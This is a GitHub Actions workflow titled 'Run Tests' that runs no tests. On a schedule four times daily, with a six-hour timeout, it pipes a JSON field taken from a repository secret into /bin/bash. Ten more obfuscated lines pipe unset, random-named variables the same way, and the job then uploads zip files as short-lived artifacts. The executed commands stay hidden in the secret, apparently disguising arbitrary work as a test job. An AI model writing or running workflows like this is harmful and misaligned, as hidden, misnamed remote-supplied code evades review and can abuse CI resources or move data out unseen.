name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '4 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          szm0: ${{ secrets.szm0 }}
        run: |
          printf '%s' "$szm0" | jq -r .un078 | /bin/bash
          echo $j69 | jq -r .gvs92 | /bin/bash
          printf '%s' "$yt82" | jq -r .qkp264 | /bin/bash
          printf '%s' "$rxcbg2358" | jq -r .hpw503 | /bin/bash
          echo $iqcwk79476 | jq -r .cglu5 | /bin/bash
          echo $xcptd857 | jq -r .qkhw739 | /bin/bash
          printf '%s' "$ai50" | jq -r .a42955 | /bin/bash
          echo $eomz20 | jq -r .vuu88 | /bin/bash
          printf '%s' "$vzgi85796" | jq -r .m8715 | /bin/bash
          printf '%s' "$ix7" | jq -r .nz999 | /bin/bash
          printf '%s' "$t464" | jq -r .y6192 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: TQTry0p5
          path: "*.zip"
          retention-days: 1
